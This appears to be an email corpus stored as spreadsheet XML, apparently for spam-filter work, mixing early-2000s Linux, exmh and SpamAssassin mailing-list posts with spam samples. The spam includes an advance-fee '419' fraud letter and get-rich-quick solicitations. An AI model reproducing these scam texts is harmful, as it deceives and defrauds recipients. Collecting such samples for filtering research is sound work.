  &gt; Its as if it cant find gpg to execute it (but I fixed that path), so there
  &gt; must be something else that I am missing...
  &gt; 
  &gt; 
  &gt; -- 
  &gt;                                         Reg.Clemens
  &gt;                                         reg@dwf.com
  &gt; 
  &gt; 
  &gt; 
  &gt; 
  &gt; _______________________________________________
  &gt; Exmh-users mailing list
  &gt; Exmh-users@redhat.com
  &gt; https://listman.redhat.com/mailman/listinfo/exmh-users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</si>
  <si>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[Spambayes] testing results
</t>
  </si>
  <si>
    <t xml:space="preserve">[Neil Schemenauer]
 &gt; These results are from timtest.py.  I've got three sets of spam and ham
 &gt; with about 500 messages in each set.  Here's what happens when I enable
 &gt; my latest "received" header code:
 If you've still got the summary files, please cvs up and try running cmp.py
 again -- in the process of generalizing cmp.py, you managed to make it skip
 half the lines &lt;wink&gt;.  That is, if you've got N sets, you *should* get
 N**2-N pairs for each error rate.  You have 3 sets, so you should get 6
 pairs of f-n rates and 6 pairs of f-p rates.
 &gt;     false positive percentages
 &gt;         0.187  0.187  tied
 &gt;         0.749  0.562  won    -24.97%
 &gt;         0.780  0.585  won    -25.00%
 &gt;
 &gt;     won   2 times
 &gt;     tied  1 times
 &gt;     lost  0 times
 &gt;
 &gt;     total unique fp went from 19 to 17
 &gt;
 &gt;     false negative percentages
 &gt;         2.072  1.318  won    -36.39%
 &gt;         2.448  1.318  won    -46.16%
 &gt;         0.574  0.765  lost   +33.28%
 &gt;
 &gt;     won   2 times
 &gt;     tied  0 times
 &gt;     lost  1 times
 &gt;
 &gt;     total unique fn went from 43 to 28
 Looks promising!  Getting 6 lines of output for each block would give a
 clearer picture, of course.
 &gt; Anthony's header counting code does not seem to help.
 It helps my test data too much &lt;wink/sigh&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] 2.40 RELEASE PROCESS: mass-check status, folks?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Theo Van Dinter said:
 &gt; &gt;         nonspam-theo.log
 &gt; 
 &gt; Hmmm.  I did re-run mass-check and resubmit...  I sort the log by score,
 &gt; so the timestamp is at the end:
 ah, OK.  didn't see that.
 --j.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</si>
  <si>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Re: [ILUG] dual keyboards
</t>
  </si>
  <si>
    <t xml:space="preserve">Carlos Luna wrote:
 &gt;Hi all.
 &gt;Does anyone know how to set up dual keyboards(one is actually a stand-alone
 &gt;keypad)?
 &gt;Both keyboards have PS/2 connections and I want the keypad to be plugged in
 &gt;as the primary input device.  Then if the other keyboard is plugged in, that
 &gt;should take over.
 &gt;Possible?  Any possible hacks?
 &gt;  
 &gt;
 get a 'keyboard switch' - I think even Viking Direct and Maplin stock them.
 &gt;  
 &gt;
 ________________________________________________________________________
 This email has been scanned for all viruses by the MessageLabs SkyScan
 service. For more information on a proactive anti-virus service working
 around the clock, around the globe, visit http://www.messagelabs.com
 ________________________________________________________________________
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] vanquishing the daemons of shell scripting
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 10:47:36AM +0100, Stephen Shirley wrote:
 ...
 &gt; 	It's very easy to get one program to act on the output of a second
 &gt; program: cmd1 | cmd2. But, what if you want cmd1 to act on the output of
 &gt; cmd2 as well? Hmm. Eventually, I came up with this solution:
 &gt; 
 &gt; 	mkfifo io
 &gt; 	cmd1 &lt;io | cmd2 &gt; io
 ...
 &gt; mine, and i is happy person once again. In case you were wondering, the
 &gt; aim of all of this was to write a shell script that could check for new
 &gt; mail on an imap server.
 Doesn't answer your question, but perhaps a combination of expect and
 (netcat or telnet) might have made for an easier solution?
 Later
 Kenn
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: xine src package
</t>
  </si>
  <si>
    <t xml:space="preserve">Same as in mplayer src package
 the --with and --without not working correctly
 I do --without arts and it still want to install with arts
 Roi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Wifi query
</t>
  </si>
  <si>
    <t xml:space="preserve">802.11b - 11Mbps per channel over three channels in the 2.4GHz range 
 (also shared with microwaves and cordless phones) at rages up to ~300 ft.
 802.11a runs on 12 channels in the 5GHz range and up to around five 
 times more bandwidth (~54Mbps or so) but has less range (60-100 ft). 
 8021.11a also adds Forward Error Correction into the scheme to allow for 
 more reliable data transmission.
 Which to use really depends on what you're doing with it. Streaming 
 video almost necessitates 802.11a, while streaming just audio can be 
 comfortably done with 802.11b provided that there isn't much 
 interference or too many clients.
 Prices? Don't know... Haven't done the research. For covering a large 
 area 802.11a will be more expensive due to the need for more APs. If you 
 want to reach the local coffee shop, however, you will need a 
 directional antenna either way.
 Check out http://www.80211-planet.com, they've got some good articles on 
 802.11... Also, some of the best info on 802.11 security I've seen can 
 be found at http://www.drizzle.com/~aboba/IEEE/.
 Give me bandwidth or give me death,
 Elias
 Tom wrote:
 &gt;... I have one very pressing question.... Wifi ranges.. ...
 &gt;
 &gt;Do I got for 802.11b stuff or do I gold out for 802.11a ? Is the price
 &gt;point break goign to warrant the differnce?
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] 2.42: est release?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Malte S. Stretz said:
 &gt; 1046 is fixed. But what about
 &gt; 1011 (add a notice about IRIX and -m to the docs),
 &gt; 1031 (cygwin's EXE_EXT),
 &gt; 1043 (a cosmetic but rather disturbing one ;-),
 all now fixed!
 &gt; 1004 (TO_MALFORMED borken),
 WONTFIX ;)
 &gt; 1006 (packaging related)?
 eh, will leave this for 2.50. ;)
 OK, if there's nothing moderately serious shown up tonight, I'll release
 it tomorrow AM (GMT).
 --j.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</si>
  <si>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Teach and Grow Rich
</t>
  </si>
  <si>
    <t xml:space="preserve"> 
                  Do You Want To Teach and Grow Rich?
 If you are a motivated and qualified communicator, I will personally train you to do 3  20 minutes presentations per day to qualify prospects that I can provide to you.  We will demonstrate to you that you can make $400 a day part time using this system.  Or, if you have 20 hours per week, as in my case, you can make in excess of $10,000 per week, as I am currently generating (verifiable, by the way).  
 Plus I will introduce you to my mentor who makes well in excess of $1,000,000 annually.
 Many are called, few are chosen.  This opportunity will be limited to one qualified individual per state.  Make the call and call the 24 hour pre-recorded message number below.  We will take as much or as little time as you need to see if this program is right for you.  
                           *** 801-397-9010 *** 
 Please do not make this call unless you are genuinely money motivated and qualified.  I need people who already have people skills in place and have either made large amounts of money in the past or are ready to generate large amounts of money in the future.  Looking forward to your call.    
                             *** 801-397-9010 *** 
 _______________________________________________________________ 
 *To be taken out of this database: 
   secco44@poetic.com  
 9059Dmel0-270bmbl15
 5677ZUad6-196gUSL4757Wrmh7-794oPGX9206MkEq3-551QUHl47
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Wifi query
</t>
  </si>
  <si>
    <t xml:space="preserve">That's what the manual said - a diversity antenna.
 Why wouldn't it work well with one omni and one directional antena? 
 IANAEE, but doesn't that count as diversity?
 &gt; -----Original Message-----
 &gt; From: Ian Andrew Bell [mailto:fork@ianbell.com] 
 &gt; Sent: Tuesday, 1 October 2002 23:23
 &gt; To: Eugen Leitl
 &gt; Cc: Damien Morton; tomwhore@slack.net; fork@spamassassin.taint.org
 &gt; Subject: Re: Wifi query
 &gt; 
 &gt; 
 &gt; 
 &gt; I think what you're looking at with the dual antenna mounts is a 
 &gt; diversity antenna.  It won't work too well with one hooked up to the 
 &gt; pringles can and the other hooked up to a regular rubber duck.
 &gt; 
 &gt; -Ian.
 &gt; 
 &gt; 
 &gt; On Tuesday, October 1, 2002, at 01:04 PM, Eugen Leitl wrote:
 &gt; 
 &gt; &gt;
 &gt; &gt; 1) reinforced concrete shields like the dickens; wood lots less so
 &gt; &gt; 2) line of sight is best (o'really?)
 &gt; &gt; 3) if you want to boost range, use directional aerials, not omnis
 &gt; &gt;
 &gt; &gt; Direct line of sight (no trees, no nothing) can give you ~10 km with
 &gt; &gt; well
 &gt; &gt; aligned directional aerials (and, say, no sleet, no 
 &gt; locusts, nor rain 
 &gt; &gt; of
 &gt; &gt; blood). If you want to fan out afterwards, use a bridge of a 
 &gt; &gt; directional
 &gt; &gt; coupling to an omni. 802.11a should shield within building 
 &gt; lots more 
 &gt; &gt; than
 &gt; &gt; 802.11b, ditto line of sight with lots of precipitation inbetween.
 &gt; &gt;
 &gt; &gt; On Tue, 1 Oct 2002, Damien Morton wrote:
 &gt; &gt;
 &gt; &gt;&gt; I just bought a LinkSys BEFW1154v2 Access Point Router for $150 
 &gt; &gt;&gt; (http://www.linksys.com/products/product.asp?grid=22&amp;prid=415). Im 
 &gt; &gt;&gt; doing some dev work on a Symbol PocketPC device with built in 
 &gt; &gt;&gt; 802.11b.
 &gt; &gt;&gt;
 &gt; &gt;&gt; In this 600 sq ft pre-war New York apartment it goes 
 &gt; through 2 or 3 
 &gt; &gt;&gt; walls, into the hallway and halfway down the first flight 
 &gt; of stairs 
 &gt; &gt;&gt; before it loses contact with the base station. That's less than 50 
 &gt; &gt;&gt; ft. Inside the apartment, it works just fine.
 &gt; &gt;&gt;
 &gt; &gt;&gt; I just did some further testing - through 2 brick walls 
 &gt; the range is 
 &gt; &gt;&gt; about 25 feet. The signal also goes through the roof pretty much 
 &gt; &gt;&gt; unimpeded.
 &gt; &gt;&gt;
 &gt; &gt;&gt; That said, the Symbol device doesn't have an antenna to 
 &gt; speak of, and
 &gt; &gt;&gt; I
 &gt; &gt;&gt; havent done any tweaking to try to extend the range.
 &gt; &gt;&gt;
 &gt; &gt;&gt; The Linksys unit has two antenna mounts - you could leave one as an
 &gt; &gt;&gt; omni
 &gt; &gt;&gt; antenna while hooking up a directional antenna to the other.
 &gt; &gt;&gt;
 &gt; &gt;&gt; You might find that you have to use several access points and/or 
 &gt; &gt;&gt; repeaters to get the coverage you want.
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] cheap linux PCs
</t>
  </si>
  <si>
    <t xml:space="preserve">Actually, I'd be more inclined to look into:
 http://www.theregister.co.uk/content/54/27489.html
 Avoiding giving any cash to a certain corporation &lt;g&gt;
 P
 &gt; -----Original Message-----
 &gt; &gt;I'd normally never buy this but the Xbox is Eur300 on IOL's shop, a very
 &gt; &gt;large company are making a loss on it and:
 &gt; &gt;
 &gt; &gt;http://xbox-linux.sourceforge.net/articles.php?aid=1&amp;sub=Press%20Release%
 &gt; 3A%20Xbox%20Linux%20Mandrake%209%20Released
 &gt; &gt;
 &gt; &gt;Mandrake has been released for it.
 &gt; 
 &gt; isn't it 250 in Smyths?
 &gt; 
 &gt; don't forget to add to that the modchip, and the time to put it on.
 &gt; 
 &gt; (/me thinks unless you want 3d graphics, www.mini-itx.com is the way to go
 &gt; :))
 &gt; 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Business Proposal
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hello
 &lt;br&gt;Dear Sir. 
 &lt;br&gt;I got your contact in cause of a seriouse search for a 
 &lt;br&gt;reliable foreign partner, which really made me to 
 &lt;br&gt;contact you for assistance in transfering my money to 
 &lt;br&gt;you for investement purpose. 
 &lt;br&gt;I'm Mr Ibrahim Jallow. the son of a late sierraleonian 
 &lt;br&gt;business man Mr Kulu Jallow..Who died two yaers ago 
 &lt;br&gt;when the revolutionary united front rebels 
 &lt;br&gt;(R.U.F)attacked our residence  in Makeni Sierra leone. 
 &lt;br&gt;Following the cease fire agreement which was reach 
 &lt;br&gt;last year with the help of United Nation peace keeping 
 &lt;br&gt;troops,I used the oppoturnity to leave the country 
 &lt;br&gt;with a very important document 
 &lt;br&gt;of(US$14.500.000m)Fourteen million Five Hundred 
 &lt;br&gt;Thounsand U.S Dollars deposited by my late father in 
 &lt;br&gt;security company in Dakar Senegal,under my name.this 
 &lt;br&gt;money was realised from diamond  export. 
 &lt;br&gt;Now' I'm searching for a trusted individual or foreing 
 &lt;br&gt;firm whom I can invest this money with  for I am!
  next 
 &lt;br&gt;of kin to these money.However I contact you based on 
 &lt;br&gt;your capability and vast knowledge on international 
 &lt;br&gt;commercial investement. For your assistance and 
 &lt;br&gt;co-opertion I will give you 15%of the total sum 
 &lt;br&gt;realised after the sucessfull transfer of this money. 
 &lt;br&gt;Please kindly communicate your acceptance of this 
 &lt;br&gt;proposal through this my e-mail address so that we can 
 &lt;br&gt;discuss the modalities of seeing this transaction 
 &lt;br&gt;through.I count on you greately for your assistance. 
 &lt;br&gt;Awaiting your earnest response With regards. 
 &lt;br&gt;Yours,faithfully.  
 &lt;br&gt;MR.Ibrahim.Jallow.
 &lt;br&gt;_____________________________________________________________________
 &lt;br&gt;&lt;br&gt;&lt;font face="Arial" size="2"&gt;&lt;b&gt;&lt;font color="#000080"&gt;Webdunia Quiz Contest&lt;/font&gt; - &lt;font color="#FF9900"&gt;Limited Time&lt;/font&gt; &lt;font color="#FF0000"&gt;Unlimited Fun&lt;/font&gt;&lt;/b&gt;.Log on to&lt;b&gt; &lt;font color="#0000FF"&gt;&lt;a href="http://quiz.webdunia.com" target="_blank"&gt;quiz.webdunia.com&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;font color="#000000"&gt; and win&lt;b&gt; &lt;/b&gt;fabulous prizes.&lt;/font&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;br&gt;India's first multilingual mailing system: Get your Free e-mail account at &lt;a href="http://www.epatra.com" target="_blank"&gt;www.epatra.com&lt;/a&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: UFOs in the Sky!
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/20.html
 Date: 2002-09-20T17:10:35-08:00
 Yesterday Viridiana came to my place and dragged me out to look at the sky. It 
 was beautiful. Odd colors and light. Obviously we wondered what it was. Today 
 Jim explains it. (It was a rocket test from the Vandenburg air force base). 
 Very neat. It was a bit too blurred out when I saw it, and there was too much 
 street light to make a good photo, so I am happy to have found the photo from 
 NASA...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: DVD+RW tools available (Was: Re: How to add service port ?)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-08-14 at 05:23, Matthias Saou wrote:
 &gt; Once upon a time, Chris wrote :
 &gt; 
 &gt; &gt; To bring things back on topic, I was practicing my "rpmbuild'n skillz"
 &gt; &gt; and made an rpm with some simple software tools to drive my DVD+RW
 &gt; &gt; burner. No GUI frontend, but it works just fine from the command line. I
 &gt; &gt; even used it to burn a bootable DVD version of Red Hat 7.3.
 &gt; &gt; 
 &gt; &gt; ftp://people.redhat.com/ckloiber/dvd+rw-tools-0.1.src.rpm
 &gt; 
 &gt; Nice! :-)
 &gt; What about the "dvdrecord" package that's already included in 7.3? It
 &gt; doesn't do what this one does? I'm asking this because I've got a friend
 &gt; with an iMac running YellowDog Linux (basically Red Hat Linux for PPC), and
 &gt; it's one of the newer versions with a DVD burner. I'd be very interested in
 &gt; using his drive to burn DVDs full of 2-CDs movies or full of "files for
 &gt; xmame" ;-)
 No, the 7.3 dvdrtools works with DVD-R and DVD-RW, this package works
 with DVD+R and DVD+RW. (Confused yet?) Unfortuantely these tools don't
 have a gui frontend, but since the workhorse is a wrapper for mkisofs,
 that shouldn't be too hard for someone who knows how to do those things.
 &gt; Also, a bootable DVD of Red Hat Linux 7.3 would be great as I've still not
 &gt; burned the CDs even once for myself since I always install through the
 &gt; network (and haven't found an easy way of purchasing an english boxed set
 &gt; here in Spain...).
 Well that was an image I put together of just the first three disks of
 the distro. Make it bootable too. Fun, but slower than a network
 install.
 -- 
 Chris Kloiber
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Working My_Mark2CurSeen
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 Content-Type: text/plain; charset=us-ascii
 After a bit of peeking through the exmh tcl and playing with tcl a bit, I got 
 the "catchup unseen messages before cur" procedure working.  Here's the code 
 for everybody and the list archives in case anyone wants it in the future.  
 Thanks to John R. LoVerso for putting me on the right track.  
 proc My_Mark2CurSeen {} {
     global exmh pick msg
     set results {}
     Exmh_Status "Clearing unseen up to cur..." red
     Mh_SetCur $exmh(folder) $msg(id)
     set unseen [Mh_Unseen $exmh(folder)]
     foreach elem $unseen {
          if { $elem &lt; $msg(id) } {
             lappend results $elem
          }
     }
     set pick(ids) $results
     busy PickMarkSeen
     Exmh_Status ok blue
 }
 If you want to use this, stick it in your .tk/exmh directory, run auto_mkindex 
 on it and add the following lines to your .exmh/exmh-defaults:
 *Fops.more.m.uentrylist:        ketchup
 *Fops.more.m.l_ketchup:         Catch-up all before current
 *Fops.more.m.c_ketchup:         My_Mark2CurSeen
 - -- 
 Ted Cabeen           http://www.pobox.com/~secabeen            ted@impulse.net 
 Check Website or Keyserver for PGP/GPG Key BA0349D2         secabeen@pobox.com
 "I have taken all knowledge to be my province." -F. Bacon  secabeen@cabeen.org
 "Human kind cannot bear very much reality."-T.S.Eliot        cabeen@netcom.com
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (FreeBSD)
 Comment: Exmh version 2.5 07/13/2001
 iD8DBQE9mJ6XoayJfLoDSdIRAkaQAJ9NL83MUU6bJRB19x7MgRaDQhc3ZwCfRK5d
 PXat04+AnSx4tHjn5p8mZVc=
 =sJtk
 -----END PGP SIGNATURE-----
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Microsoft developer newsletter tagged as spam
</t>
  </si>
  <si>
    <t xml:space="preserve">This MSDN mail thing reminds me of how I've documented this feature of
 SpamAssassin here so that our users understand it.
 I define "Solicited Commercial Email" vs "Unsolicited Commercial Email" -
 the latter being SPAM. As SpamAssassin basically looks for "Commercial
 Email", both get hit, and that's something they must understand.
 Our SA documentation further tells users to filter off their SCE before
 applying a SA rule - gets rid of 100% of the problem as the users know who
 is sending them SCE.
 -- 
 Cheers
 Jason Haar
 Information Security Manager, Trimble Navigation Ltd.
 Phone: +64 3 9635 377 Fax: +64 3 9635 417
 PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1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</si>
  <si>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Philip Reynolds wrote:
 &gt;&gt;Does anyone know how to list the biggest file in my
 &gt;&gt;root directory?or the second biggest ..etc...
 &gt; $ find /dir -name \*  | xargs du -s | sort -n
 You might want to put a '-type f' on that find.
 Paul.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: advice on 7.3.92 to 7.3.93, and Apt compiling
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :
 &gt; On Mon, 19 Aug 2002 16:44:30 +0200, Matthias Saou &lt;matthias@egwn.net&gt;
 &gt; wrote:
 &gt; 
 &gt; [snipped]
 &gt; 
 &gt; &gt; Then why bother : The new Red Hat Linux beta "(null)" is now available
 &gt; &gt; and should be announced anytime now. It contains rpm 4.1-0.81.
 &gt; &gt; 
 &gt; &gt; You can grab it from here :
 &gt; &gt; ftp://ftp.freshrpms.net/pub/redhat/linux/beta/null/
 &gt; 
 &gt;     What's the official "apt" line for it?  Is it just 7.4 instead of
 &gt;     7.3, or did they make this one 8.0?
 This is a beta, probably of 8.0 although it's numbered 7.3.94. As such,
 I've set up no apt repository for it, although you may find a few of my
 packages recompiled for it under the /pub/freshrpms/null/ directory of my
 ftp server.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</si>
  <si>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Be Your Own Boss!!                         13986
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;FONT  BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10&gt;&lt;BR&gt;
                  FOLLOW ME TO FINANCIAL FREEDOM!!&lt;BR&gt;
 &lt;BR&gt;
 I Am looking for people with good work ethic and extrordinary desire&lt;BR&gt;
  to earn at least $10,000 per month working from home!&lt;BR&gt;
 &lt;BR&gt;
 NO SPECIAL SKILLS OR EXPERIENCE REQUIRED We will give you all the &lt;BR&gt;
 training and personal support you will need to ensure your success!&lt;BR&gt;
 &lt;BR&gt;
 This LEGITIMATE HOME-BASED INCOME OPPORTUNITY can put you back in&lt;BR&gt;
                control of your time,your finances,and your life!&lt;BR&gt;
 &lt;BR&gt;
 If you've tried other opportunities in the past that have failed to &lt;BR&gt;
                live up their promises,&lt;BR&gt;
 &lt;BR&gt;
      THIS IS DIFFERENT THEN ANYTHING ELSE YOU'VE SEEN!&lt;BR&gt;
 &lt;BR&gt;
        THIS IS NOT A GET RICH QUICK SCHEME!&lt;BR&gt;
 &lt;BR&gt;
 YOUR FINANCIAL PAST DOES NOT HAVE TO BE YOUR FINANCIAL FUTURE!&lt;BR&gt;
 &lt;BR&gt;
                CALL ONLY IF YOU ARE SERIOUS!&lt;BR&gt;
 &lt;BR&gt;
                  1-800-345-9708 &lt;BR&gt;
 &lt;BR&gt;
     DONT GO TO SLEEP WITHOUT LISTENING TO THIS!&lt;BR&gt;
 &lt;BR&gt;
 "ALL our dreams can come true- if we have the courage to persue them"&lt;BR&gt;
                    -Walt Disney&lt;BR&gt;
 &lt;BR&gt;
 Please Leave Your Name And Number And Best Time To Call&lt;BR&gt;
 &lt;BR&gt;
                DO NOT RESPOND BY EMAIL&lt;BR&gt;
 &lt;BR&gt;
 This is not a SPAM. You are receiving this because&lt;BR&gt;
 you are on a list of email addresses that I have bought.&lt;BR&gt;
 And you have opted to receive information about&lt;BR&gt;
 business opportunities. If you did not opt in to receive&lt;BR&gt;
 information on business opportunities then please accept &lt;BR&gt;
 our apology. To be REMOVED from this list simply reply &lt;BR&gt;
 with REMOVE as the subject. And you will NEVER receive &lt;BR&gt;
 another email from me.&lt;/FONT&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: From
</t>
  </si>
  <si>
    <t xml:space="preserve">
 mcmasjc@tatanka.stortek.com said:
 &gt; 3)  You can learn to use procmail,
 Can this be done via .forward?  I don't have root on the machine my
 mailbox is on, and I'm absolutely certain that a complaint to the sysadmin
 about sendmail will get a simple response: shut down the daemon and tell
 me to use Outlook. :(
 --
 73 de ke9tv/2, Kevin KENNY   GE Corporate Research &amp; Development
 kennykb@crd.ge.com           P. O. Box 8, Bldg. K-1, Rm. 5B36A
                              Schenectady, New York 12301-0008 USA
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: An Untapped Market = An Easy Sale
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_152120_01C1FF20.AD02E910
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  North Star Marketing's commitment	
 As the exclusive marketers of John Alden products, North Star Marketing
 (NSM) is committed to helping you be successful. Every time you call
 your local NSM office, you'll speak with an experienced health insurance
 professional. Thousands of agents already rely on NSM for assistance
 with prospecting, quoting, issuing policies, marketing ideas and
 follow-up support. And, since John Alden is also a leader in the
 individual medical insurance market, North Star can further help you
 meet your clients' needs.
  Let's talk today!
  LinkLink to the North Star Marketing directory
 &lt;http://www.nstarmarketing.com/fh/northstar/jaimepromo.htm&gt;  to contact
 an office near you.
  or
  Complete all the information below and an NSM Rep in your state will
 contact you directly. 	
 Name:	  	
 Company	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	 	
  	Insurance products are underwritten and issued by John Alden
 Life Insurance Company, and administered by Fortis Insurance Company,
 both Fortis Health member companies, Milwaukee, WI. Short Term Medical
 is presented by North Star Marketing, www.nstarmarketing.com
 &lt;http://www.nstarmarketing.com&gt; 
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_152120_01C1FF20.AD02E910
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;An Untapped Market =3D An Easy Sale&lt;/title&gt;
 &lt;/head&gt;
 &lt;body link=3D"#FF0000" vlink=3D"#0000FF" bgcolor=3D"#FFFFFF" =
 alink=3D"#FF0000"&gt;
   &lt;table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"550" =
 align=3D"center"&gt;
     &lt;tr&gt;=20
       &lt;td colspan=3D"3"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/alden/rawcrowd.jpg" width=3D"550" =
 height=3D"238"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;=20
       &lt;td&gt;&lt;img src=3D"http://63.211.81.87/images/alden/untapped.gif" =
 width=3D"200" height=3D"154"&gt;&lt;/td&gt;
       &lt;td&gt;&lt;img src=3D"http://63.211.81.87/images/alden/simple.gif" =
 width=3D"175" height=3D"154"&gt;&lt;/td&gt;
       &lt;td&gt;&lt;img src=3D"http://63.211.81.87/images/alden/stm_bullets.gif" =
 width=3D"175" height=3D"154"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;=20
       &lt;td colspan=3D"3"&gt;=20
         &lt;table border=3D"0" cellspacing=3D"1" width=3D"550"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/alden/nsmhead.gif" width=3D"550" =
 height=3D"20" alt=3D"North Star Marketing's commitment"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;small&gt;As the exclusive marketers of John Alden =
 products, North=20
               Star Marketing (NSM) is committed to helping you be =
 successful.=20
               Every time you call your local NSM office, you'll speak =
 with an=20
               experienced health insurance professional. Thousands of =
 agents already=20
               rely on NSM for assistance with prospecting, quoting, =
 issuing policies,=20
               marketing ideas and follow-up support. And, since John =
 Alden is=20
               also a leader in the individual medical insurance market, =
 North=20
               Star can further help you meet your clients' =
 needs.&lt;/small&gt;&lt;br&gt;
               &lt;img src=3D"http://63.211.81.87/images/alden/space.gif" =
 width=3D"5" height=3D"20"&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" =
 align=3D'center'&gt;
     &lt;tr&gt;=20
       &lt;td&gt;=20
         &lt;table width=3D"100%" bgcolor=3D"#003366"&gt;
           &lt;tr&gt;=20
             &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
               &lt;td&gt;=20
                 &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#ffffff"&gt;
                   &lt;tr&gt;=20
                     &lt;td colspan=3D"5" bgcolor=3D"#CCFFFF"&gt;=20
                         &lt;img =
 src=3D"http://63.211.81.87/images/alden/letstalk.gif" width=3D"475" =
 height=3D"25" alt=3D"Let's talk today!"&gt;&lt;br&gt;
                         &lt;small&gt;
                         &lt;img =
 src=3D"http://63.211.81.87/images/alden/yellowbullet.gif" width=3D"13" =
 height=3D"10" alt=3D"Link" border=3D"0"&gt;
                         Link to the &lt;a =
 href=3D"http://www.nstarmarketing.com/fh/northstar/jaimepromo.htm"&gt;North =
                         Star Marketing directory&lt;/a&gt; to contact an =
 office near you.&lt;br&gt;
                         &lt;img =
 src=3D"http://63.211.81.87/images/alden/or.gif" width=3D"15" =
 height=3D"15" alt=3D"or"&gt;&lt;br&gt;
                         &lt;img =
 src=3D"http://63.211.81.87/images/alden/yellowbullet.gif" width=3D"13" =
 height=3D"10"&gt;
                         Complete all the information below and an NSM =
 Rep in your state=20
                         will contact you directly. &lt;/small&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;=20
                     &lt;td width=3D"15%" align=3D"right" =
 bgcolor=3D"#CCFFFF"&gt;Name:&lt;/td&gt;
                     &lt;td colspan=3D"4" bgcolor=3D"#CCFFFF"&gt;=20
                       &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;=20
                     &lt;td width=3D"15%" align=3D"right" =
 bgcolor=3D"#CCFFFF"&gt;Company&lt;/td&gt;
                     &lt;td colspan=3D"4" bgcolor=3D"#CCFFFF"&gt;=20
                       &lt;input type=3D"text" name=3D"company" size=3D"50"&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;=20
                     &lt;td width=3D"15%" align=3D"right" =
